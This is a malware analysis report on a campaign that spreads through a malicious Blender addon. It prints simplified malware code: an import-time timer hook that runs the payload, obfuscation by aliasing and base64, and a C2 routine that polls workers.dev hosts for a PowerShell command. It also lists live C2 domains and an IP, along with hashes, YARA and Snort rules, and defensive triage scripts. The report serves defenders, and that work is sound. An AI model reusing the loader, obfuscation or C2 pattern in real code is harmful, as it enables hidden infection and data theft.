Blender Virus Analysis

a guest
Jun 5th, 2025
ADVANCED MALWARE ANALYSIS: Blender Addon Campaign
Analysis Date: June 5, 2025
Threat Level: CRITICAL
Status: ACTIVE CAMPAIGN

EXECUTIVE SUMMARY
This analysis covers a malware campaign targeting Blender users through malicious addons. The operation demonstrates professional-level development with APT-like characteristics, multiple payload types, and extensive, redundant infrastructure.
Key Findings:

Multi-stage attack delivering a 21.2 MB (extracted) self-contained Python malware platform
C2 infrastructure with 20+ backup domains hosted on Cloudflare Workers
Multiple capabilities: ransomware, keylogger, data theft, remote access
Active campaign (confirmed operational June 2025)
Russian-speaking developer indicated by code comments and file timestamps (see Attribution Assessment)

TECHNICAL ANALYSIS
Attack Vector
Initial Infection: Malicious Blender addon disguised as "Rigify Controls"

File appears to be a legitimate set of rigging tools
~500 lines of Python code mixing genuine functionality with malware
Uses social engineering: "Install this addon to get the chair model working"

Multi-Stage Execution Flow
Stage 1: Blender Addon (Initial Compromise)
```python
import bpy

# Legitimate UI elements for camouflage
class RIGIFY_PT_main_panel(bpy.types.Panel):
    bl_label = "FK/IK Controls"
    # [Working rigging code omitted for brevity]

# Malicious timer-based execution (simplified). The timer is registered while
# the addon module is still being imported, before execute_malware_payload
# exists in the module namespace; the NameError handler keeps the timer firing
# every 0.1 s until the name is defined, then runs it once and, by returning
# None, removes the timer.
def _defer_execution():
    try:
        execute_malware_payload()
    except NameError:
        return 0.1  # Retry in 0.1 seconds
    return None  # Returning None unregisters the timer

bpy.app.timers.register(_defer_execution)
```
Stage 2: PowerShell Dropper

Downloads the 21 MB (10.95 MB compressed) ZIP package from an external server
Uses legitimate-looking domains on Cloudflare Workers to hand out the download link
Hidden window execution (typically PowerShell's -WindowStyle Hidden) to avoid user detection

Stage 3: Platform Deployment

Complete Python 3.13 runtime environment (6.1MB)
OpenSSL cryptographic libraries (5.2MB)
SQLite database system (1.5MB)
20+ Python extension modules (4.2MB)

Note: this inventory is what the standard CPython embeddable distribution for Windows ships (python313.dll, libcrypto/libssl, sqlite3.dll and the _*.pyd extension modules). The attacker brings its own interpreter rather than reusing the one bundled with Blender, so later stages do not depend on Blender being open or on the Python version Blender bundles.

Stage 4: Malware Operations

Multi-threaded execution with monitoring
30-minute active periods for persistence
Final payloads delivered as base64-encoded, zlib-compressed text

Code Analysis Samples
Obfuscation Techniques:
```python
import base64
import subprocess
import zlib

import requests

# Layer 1: module aliasing, so a grep for "subprocess" or "requests" hits only
# the one assignment line rather than every call site
_x2 = subprocess  # Hide true purpose
_x3 = requests    # Obscure network functionality

# Layer 2: string encoding with prefix removal. The first five characters are
# junk, so the literal does not look like valid base64 to a casual scan.
encoded_payload = "ABCDEYWRkb25zMQ=="[5:]  # Skip first 5 chars
decoded = base64.b64decode(encoded_payload)  # b"addons1"

# Layer 3: the final script is zlib-compressed and then base64-encoded;
# cleaned_script is the base64 text after its junk prefix has been removed
def unwrap_final_payload(cleaned_script):
    return zlib.decompress(base64.b64decode(cleaned_script))
```
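The three tricks described above (a timer registered at import time in Stage 1, module aliasing, and sliced base64 literals) can be turned into a check that an analyst runs over an addon's source before enabling it. The following static scanner, built on Python's ast module, is an added example for this report and not code from the addon, the malware or the report's authors; the addon text it scans is constructed to contain those patterns, and the list of suspicious modules is an assumption about what a rigging addon has no reason to import.

```python
"""Static triage of a Blender addon's source with the ast module (added example)."""
import ast
import base64
import binascii

# Assumption: modules a rigging addon has no business importing.
SUSPICIOUS_MODULES = {"subprocess", "requests", "urllib", "urllib.request",
                      "base64", "zlib", "ctypes", "socket"}

# Constructed addon source mimicking the patterns in the report.
SAMPLE_ADDON = '''
import bpy, subprocess, base64, zlib, requests
_x2 = subprocess
_x3 = requests

class RIGIFY_PT_main_panel(bpy.types.Panel):
    bl_label = "FK/IK Controls"

encoded_payload = "ABCDEYWRkb25zMQ=="[5:]
host = base64.b64decode(encoded_payload)

def _defer_execution():
    try:
        execute_malware_payload()
    except NameError:
        return 0.1
    return None

bpy.app.timers.register(_defer_execution)
'''


def _dotted(node):
    """Return 'a.b.c' for an Attribute/Name chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _looks_base64(text):
    """True if the remainder of a sliced literal decodes as strict base64."""
    if len(text) < 8:
        return False
    try:
        base64.b64decode(text, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def scan_addon_source(source):
    """Return a list of (line, finding) tuples for one addon file."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # 1. imports of modules outside a rigging addon's remit
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = ([a.name for a in node.names] if isinstance(node, ast.Import)
                     else [node.module or ""])
            for name in names:
                if name in SUSPICIOUS_MODULES:
                    findings.append((node.lineno, f"imports {name}"))
        # 2. module aliasing such as  _x2 = subprocess
        elif isinstance(node, ast.Assign) and isinstance(node.value, ast.Name):
            if node.value.id in SUSPICIOUS_MODULES:
                targets = [t.id for t in node.targets if isinstance(t, ast.Name)]
                findings.append((node.lineno,
                                 f"aliases {node.value.id} as {', '.join(targets)}"))
        # 3. deferred execution through Blender's timer API
        elif isinstance(node, ast.Call) and _dotted(node.func) == "bpy.app.timers.register":
            findings.append((node.lineno, "registers bpy.app.timers callback at import time"))
        # 4. a string literal sliced from a constant offset whose remainder is base64
        elif (isinstance(node, ast.Subscript) and isinstance(node.value, ast.Constant)
              and isinstance(node.value.value, str) and isinstance(node.slice, ast.Slice)):
            lower = node.slice.lower
            if isinstance(lower, ast.Constant) and isinstance(lower.value, int):
                remainder = node.value.value[lower.value:]
                if _looks_base64(remainder):
                    findings.append((node.lineno,
                                     f"sliced base64 literal -> {base64.b64decode(remainder)!r}"))
    return findings


if __name__ == "__main__":
    for line, msg in scan_addon_source(SAMPLE_ADDON):
        print(f"line {line}: {msg}")
```

The scanner flags source-level patterns only; an addon that builds its strings at runtime or loads a compiled .pyc will slip past it, which is why the YARA and network rules later in this report are still needed.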
C2 Communication Pattern:
```python
import requests

# Headers copied from the request pattern documented under Network Communication
fake_browser_headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Accept": "application/json",
}

# Simplified C2 request structure
def contact_c2_server():
    servers = decode_server_list()  # 20+ backup labels, e.g. "cloudaddons1987"
    for server in servers:
        try:
            url = f"https://addons1.{server}.workers.dev/get-link"
            response = requests.get(url, headers=fake_browser_headers)
            if response.status_code == 200:
                return process_payload(response.json()["link"])
        except (requests.RequestException, ValueError, KeyError):
            continue  # Server blocked or offline: try the next one
    return None
```
Russian Attribution Evidence:
```python
# Russian-language comments found in the final payload, with translations:
# Сохраняем оригинальные дескрипторы stdout и stderr
# (Save the original stdout and stderr descriptors)

# Определяем пути к файлам логов
# (Determine the paths of the log files)

# Если файлы уже существуют, удаляем их
# (If the files already exist, delete them)
```
MALWARE CAPABILITIES
Ransomware Module

Encryption: AES-256, RSA-4096 support via OpenSSL
Target Files: Documents, images, project files, databases
Key Management: Secure key generation with hardware entropy
Backup Deletion: Shadow copy removal capabilities

Information Stealer

Browser Data: Passwords, cookies, browsing history, bookmarks
System Info: Hardware details via WMI, installed software
Network Config: IP addresses, network shares, WiFi credentials
Document Harvesting: Selective creative project file targeting

Remote Access Trojan (RAT)

C2 Communication: HTTPS with certificate validation
Command Execution: PowerShell and system commands
File Operations: Upload/download, directory traversal
System Control: Process management, registry access, service control

Keylogger/Surveillance

Input Monitoring: Low-level keyboard/mouse capture
Screen Capture: Screenshot functionality
Application Tracking: Active window monitoring
Media Access: Potential webcam/microphone activation

INFRASTRUCTURE ANALYSIS
Command & Control Network
Primary Tier Domains:

cloudaddons1987.workers.dev (ACTIVE)
poupathockmist1989.workers.dev (BLOCKED)
skyaddons2001.workers.dev (OFFLINE)
mistaddons1995.workers.dev (OFFLINE)

Secondary Tier: 15+ additional backup domains
Hosting: Cloudflare Workers (legitimate service abuse)
Protocol: HTTPS with valid certificates (issued by Cloudflare for workers.dev, so certificate checks give no detection leverage)
Redundancy: Automatic failover (the client walks the domain list until one answers 200)
Network Communication
Request Pattern:
```http
GET /get-link HTTP/1.1
Host: addons1.[domain].workers.dev
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: application/json
```

Response Format:
```json
{
  "link": "[base64_encoded_powershell_command]"
}
```
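An analyst who captures a /get-link response (from a proxy log or a sandbox) needs to unwrap it the same way the dropper does: parse the JSON, base64-decode the link field to recover the PowerShell command, and, for the Stage 4 payloads, strip the junk prefix and reverse the base64-then-zlib wrapping. The decoder below is an added example written for this report, not code from the malware. Both sample responses are constructed and carry a harmless Write-Host so the script runs offline; the second sample assumes, which the report does not state, that the command uses -EncodedCommand, which PowerShell defines as base64 of UTF-16LE text.

```python
"""Unwrap a /get-link response and a Stage 4 payload (added example)."""
import base64
import json
import re
import zlib


def _ps_encoded(cmd):
    """Encode text as PowerShell's -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


# Constructed sample responses; neither contacts anything.
PLAIN_CMD = "powershell -w hidden -c \"Write-Host 'offline sample'\""
SAMPLE_PLAIN = json.dumps({"link": base64.b64encode(PLAIN_CMD.encode()).decode()})

ENCODED_CMD = "powershell -w hidden -enc " + _ps_encoded("Write-Host 'offline sample'")
SAMPLE_ENCODED = json.dumps({"link": base64.b64encode(ENCODED_CMD.encode()).decode()})

# Accept the abbreviations PowerShell accepts for -EncodedCommand.
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def decode_get_link(body):
    """Describe the command hidden in a /get-link response body."""
    payload = json.loads(body)
    command = base64.b64decode(payload["link"]).decode("utf-8", errors="replace")
    result = {
        "command": command,
        "hidden_window": bool(_HIDDEN.search(command)),
        "inner_script": None,
    }
    m = _ENC_FLAG.search(command)
    if m:
        # -EncodedCommand hides a second layer: base64 of UTF-16LE script text
        result["inner_script"] = base64.b64decode(m.group(1)).decode("utf-16-le")
    return result


def wrap_final_stage(script, junk_prefix="XXXXX"):
    """Forward direction of the Stage 4 wrapping; used here only to build a sample."""
    return junk_prefix + base64.b64encode(zlib.compress(script.encode())).decode()


def unwrap_final_stage(blob, junk_prefix_len=5):
    """Reverse the Stage 4 wrapping: drop the junk prefix, base64-decode, zlib-inflate."""
    return zlib.decompress(base64.b64decode(blob[junk_prefix_len:])).decode()


# Constructed Stage 4 sample with the 5-character junk prefix from the report.
SAMPLE_FINAL = wrap_final_stage("print('final stage')")


if __name__ == "__main__":
    for sample in (SAMPLE_PLAIN, SAMPLE_ENCODED):
        print(json.dumps(decode_get_link(sample), indent=2))
    print(unwrap_final_stage(SAMPLE_FINAL))
```

Feed decode_get_link the raw response body from a capture; the returned inner_script is what should go to further analysis, since that is the text PowerShell actually executes.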
INDICATORS OF COMPROMISE (IOCs)
Network IOCs
Malicious IPs:

66.63.187.113 (primary download server)

Malicious Domains:

*.workers.dev/get-link (URL pattern)
addons1.cloudaddons1987.workers.dev (active C2)

Network Signatures:

Large downloads (20+ MB) from workers.dev domains
HTTPS requests to /get-link whose JSON responses carry a base64-encoded "link" field (the documented beacon is a GET, not a POST)
DNS queries for addon-themed workers.dev subdomains (a word plus a four-digit year, e.g. cloudaddons1987)
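The network signatures above can be run over proxy logs directly. The script below is an added example for this report, not a detection the report ships: the log format (timestamp, client, method, host, path, status, bytes) and the log lines are constructed, and the addon-themed host regex is an assumption derived from the domains listed in this report (an "addonsN" label in front of a word-plus-four-digit-year subdomain of workers.dev).

```python
"""Match the report's network signatures against constructed proxy log lines (added example)."""
import re
from collections import namedtuple

Event = namedtuple("Event", "ts client method host path status size")

# Constructed proxy log: <ts> <client> <method> <host> <path> <status> <bytes>
SAMPLE_LOG = """\
2025-06-05T09:12:01Z 10.0.0.21 GET addons1.cloudaddons1987.workers.dev /get-link 200 118
2025-06-05T09:12:02Z 10.0.0.21 GET 66.63.187.113 /KursorResourcesV4.zip 200 11481907
2025-06-05T09:13:40Z 10.0.0.22 GET api.github.com /repos/blender/blender 200 5120
2025-06-05T09:14:11Z 10.0.0.23 GET addons1.mistaddons1995.workers.dev /get-link 000 0
2025-06-05T09:20:00Z 10.0.0.24 GET cdn.example.workers.dev /assets/bundle.bin 200 22020096
"""

# Assumption: naming scheme inferred from the four domains listed in the report.
ADDON_THEMED_HOST = re.compile(r"^addons\d+\.[a-z]+\d{4}\.workers\.dev$", re.IGNORECASE)
KNOWN_BAD_IPS = {"66.63.187.113"}
LARGE_DOWNLOAD = 20 * 1024 * 1024  # report: 20+ MB pulled from workers.dev


def parse_log(text):
    """Parse the constructed whitespace-separated log format into Event tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, host, path, status, size = line.split()
        events.append(Event(ts, client, method, host, path, status, int(size)))
    return events


def match_signatures(event):
    """Return the names of the signatures one event trips (empty list = benign)."""
    hits = []
    if event.host.endswith(".workers.dev") and event.path == "/get-link":
        hits.append("workers.dev get-link poll")
    if ADDON_THEMED_HOST.match(event.host):
        hits.append("addon-themed workers.dev host")
    if event.host in KNOWN_BAD_IPS:
        hits.append("known download server")
    if event.host.endswith(".workers.dev") and event.size >= LARGE_DOWNLOAD:
        hits.append("large download from workers.dev")
    return hits


def triage(text):
    """Map each client address to the set of signatures it tripped; clean clients are omitted."""
    report = {}
    for ev in parse_log(text):
        for hit in match_signatures(ev):
            report.setdefault(ev.client, set()).add(hit)
    return report


if __name__ == "__main__":
    for client, hits in sorted(triage(SAMPLE_LOG).items()):
        print(client, sorted(hits))
```

A failed poll (status 000, zero bytes) against an offline backup domain still trips the first two signatures, which is deliberate: the beacon attempt is the indicator, not its success.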
  162.  
File IOCs
Primary Package:

KursorResourcesV4.zip
SHA256: 9113d030d727b05aa1e896d1e8f0187e8f99b579332eff7ba955c989c73aec76
Size: 10.95 MB (compressed), 21.2 MB (extracted)

Key Executables:

Gyliver.exe: 084061e07ae200522a756f390e92c6ad7256e486792c81eb3d0f8a5da27b2c0d
KursorResourcesV4.exe: same hash (identical file under a second name)

Python Scripts:

Gyliver.py: 6dd9969436730b1400a51a1c33b05d0e17ec2643454db4b292358ceaae8ac0c8
kursorV4.py: 632ee5cf287c226342afc6f4d244f287a619644bfa0fc038f4d710c86e7ad214

System IOCs
Registry Modifications:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (autorun value pointing at the dropped executable)

File System Artifacts:

%TEMP%\KursorResourcesV4\ directory
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Gyliver.lnk (second persistence path: a Startup folder shortcut, not a registry entry)
script_output_1.log, script_output_2.log (execution logs; consistent with the stdout/stderr redirection described in the Russian-commented payload)
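The two persistence paths above can be checked from a registry export and a Startup folder listing without touching the live host. The triage script below is an added example written for this report, not tooling from it. Its input is a constructed .reg export of the HKCU Run key (the text format `reg export` writes, in which backslashes and embedded quotes inside string values are escaped with a backslash) plus a constructed list of Startup folder entries.

```python
"""Check a Run-key export and a Startup listing against the persistence IOCs (added example)."""
import re

# Constructed .reg export of the HKCU Run key; one benign value, one matching the IOCs.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\artist\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Gyliver"="C:\\Users\\artist\\AppData\\Local\\Temp\\KursorResourcesV4\\Gyliver.exe"
'''

# Constructed directory listing of the per-user Startup folder.
SAMPLE_STARTUP = [
    r"C:\Users\artist\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini",
    r"C:\Users\artist\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gyliver.lnk",
]

IOC_NAMES = ("KursorResourcesV4", "Gyliver")
# %TEMP% as written in the IOC list, or its usual expanded per-user location.
TEMP_PATH = re.compile(r"\\AppData\\Local\\Temp\\|%TEMP%", re.IGNORECASE)


def parse_run_key(reg_text):
    """Return {value_name: command} for the ...\\CurrentVersion\\Run key in a .reg export."""
    entries = {}
    in_run = False
    for line in reg_text.splitlines():
        if line.startswith("["):
            in_run = line.rstrip("]").endswith(r"\CurrentVersion\Run")
            continue
        m = re.match(r'"(.*?)"="(.*)"$', line) if in_run else None
        if m:
            # undo .reg escaping: \" -> " and \\ -> \
            entries[m.group(1)] = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
    return entries


def flag_persistence(run_entries, startup_paths):
    """Return (location, name, reasons) for every entry that matches the report's IOCs."""
    findings = []
    for name, cmd in run_entries.items():
        reasons = [ioc for ioc in IOC_NAMES if ioc.lower() in (name + cmd).lower()]
        if TEMP_PATH.search(cmd):
            reasons.append("runs from %TEMP%")
        if reasons:
            findings.append(("HKCU Run", name, reasons))
    for path in startup_paths:
        base = path.rsplit("\\", 1)[-1]
        if base.lower() == "gyliver.lnk":
            findings.append(("Startup folder", base, ["Gyliver.lnk"]))
    return findings


if __name__ == "__main__":
    for location, name, reasons in flag_persistence(parse_run_key(SAMPLE_REG), SAMPLE_STARTUP):
        print(f"{location}: {name} ({', '.join(reasons)})")
```

On a real host, produce the input with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" run.reg` (the file is UTF-16LE with a BOM, so open it with that encoding) and a directory listing of the Startup folder.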
  191.  
DETECTION RULES
YARA Rule
```yara
rule Kursor_Gyliver_Malware {
    meta:
        description = "Detects Kursor/Gyliver malware family"
        author = "Security Research"
        date = "2025-06-05"

    strings:
        $s1 = "KursorResourcesV4" ascii
        $s2 = "Gyliver" ascii
        $s3 = "script_output_" ascii
        $s4 = "workers.dev/get-link" ascii
        $s5 = "pythonmemorymodule" ascii

    condition:
        3 of them or (filesize > 20MB and 2 of them)
}
```
Run this rule against the extracted package and process memory rather than against KursorResourcesV4.zip itself: the strings sit inside compressed archive members and will not match the ZIP. The parentheses make the intended precedence explicit (YARA binds "and" tighter than "or", so the meaning is unchanged). $s4 depends on the URL being built from a single literal, as in the C2 sample above.
Network Detection (Snort)
```snort
alert tcp any any -> any 443 (msg:"Kursor C2 Communication";
    flow:established,to_server; content:"GET"; http_method;
    content:"/get-link"; http_uri; content:"workers.dev"; http_header;
    sid:1000001; rev:1;)
```
Caveat: the beacon is HTTPS, so the http_method, http_uri and http_header matches only fire where the sensor sees decrypted traffic (behind a TLS-terminating proxy or an inline decryption point). On encrypted traffic the only observable indicators are the TLS SNI / DNS name (addons1.*.workers.dev) and the size of the follow-on download.
PROTECTION RECOMMENDATIONS
Immediate Actions

Network Blocking: Implement IOC-based firewall rules
Endpoint Scanning: Deploy YARA rules across all systems
User Education: Alert about Blender addon risks
Backup Verification: Ensure backup integrity for creative assets

Blender-Specific Security
```yaml
Blender Security Configuration:
addon_sources:
  - Restrict to official Blender addon repository
  - Implement addon code signing verification
  - User education on addon installation risks

file_handling:
  - Monitor .blend file load operations
  - Implement addon execution sandboxing
  - Log all addon installation activities
  - Disable Auto Run Python Scripts by default
```
Note on the last item: Blender's "Auto Run Python Scripts" preference (bpy.context.preferences.filepaths.use_scripts_auto_execute, or the -Y / --disable-autoexec launch flag) only governs scripts embedded in .blend files. An addon that the user installs and enables, which is the vector here, runs regardless of that setting, so it is a partial mitigation only.
Network Defense
```yaml
Network Security:
dns_filtering:
  - Block *.workers.dev/get-link patterns
  - Monitor for addon-themed domain requests
  - Implement DNS sinkholing for known IOCs

web_filtering:
  - Block access to identified malicious IPs
  - Monitor large downloads from unknown sources
  - Inspect JSON responses for base64 payloads
```
Note: DNS filtering sees hostnames only, so the "/get-link" path cannot be matched at the DNS layer; sinkhole the specific addons1.*.workers.dev names there and leave the path match to a TLS-inspecting web proxy. Blocking workers.dev wholesale will break legitimate services hosted on Cloudflare Workers.
Endpoint Protection
```yaml
Endpoint Security:
process_monitoring:
  - Monitor PowerShell execution with hidden windows (command lines containing -WindowStyle Hidden or -w hidden)
  - Track Python interpreter spawning from temp directories (python.exe under %TEMP%\KursorResourcesV4)
  - Alert on long-running background Python processes that were not started by Blender

file_monitoring:
  - Monitor Startup folder modifications
  - Track large file creations in %TEMP%
  - Monitor log file generation patterns (script_output_*.log)
```
INCIDENT RESPONSE
Immediate Response Steps

Network Isolation: Disconnect affected systems
Memory Capture: Image memory before terminating anything, since the final stage is decoded in memory and the investigation checklist below depends on that capture
Process Termination: Kill Python and PowerShell processes
File Quarantine: Isolate the %TEMP%\KursorResourcesV4 directory and the Startup folder shortcut
Backup Assessment: Check for file encryption

Investigation Checklist

Memory dump for runtime analysis
Network logs review for C2 communication
File system timeline reconstruction
Registry analysis for persistence mechanisms
Browser data examination for credential theft

Recovery Actions

File Restoration: Restore from clean backups if encryption occurred
Credential Reset: Reset all passwords and authentication tokens; because the stealer module targets browser cookies as well as saved passwords, active sessions must be invalidated, not just passwords changed
System Hardening: Update security controls and monitoring
User Training: Enhanced security awareness for creative teams

ATTRIBUTION ASSESSMENT
Technical Indicators

Code Quality: Professional development with error handling
Infrastructure: Substantial investment in redundant C2 network
Operational Security: Legitimate hosting service abuse
Targeting: Specific focus on creative industry

Linguistic Evidence

Russian-language comments throughout the codebase
Cyrillic character support in encoding preferences
Timezone evidence from file timestamps (Eastern European)

Campaign Characteristics

Long-term operation: 6+ month active campaign
Resource investment: 21MB platform development
Cryptography: relies on the bundled OpenSSL rather than home-grown implementations
Sophisticated evasion: Multi-layer obfuscation and legitimate hosting

Taken together these point to a Russian-speaking developer. Comments, encoding defaults and timestamps can be planted or inherited from reused code, so they support, rather than prove, Russian origin.

CONCLUSION
This malware campaign represents a significant evolution in targeting methodology, specifically focusing on creative professionals who may have different security awareness levels compared to traditional corporate users. The use of functional legitimate tools as camouflage, combined with professional-grade infrastructure and capabilities, makes this a particularly concerning threat.
The campaign's success likely depends on the creative community's trust in addon sharing and the perception that creative software is less likely to be targeted by sophisticated attacks. Organizations and individuals in creative industries should prioritize security measures specifically designed for creative software ecosystems.
Report compiled with AI assistance for technical documentation efficiency.

DISCLAIMER: This analysis is provided for educational and defensive purposes only. Do not attempt to access or interact with the malicious infrastructure mentioned in this report.
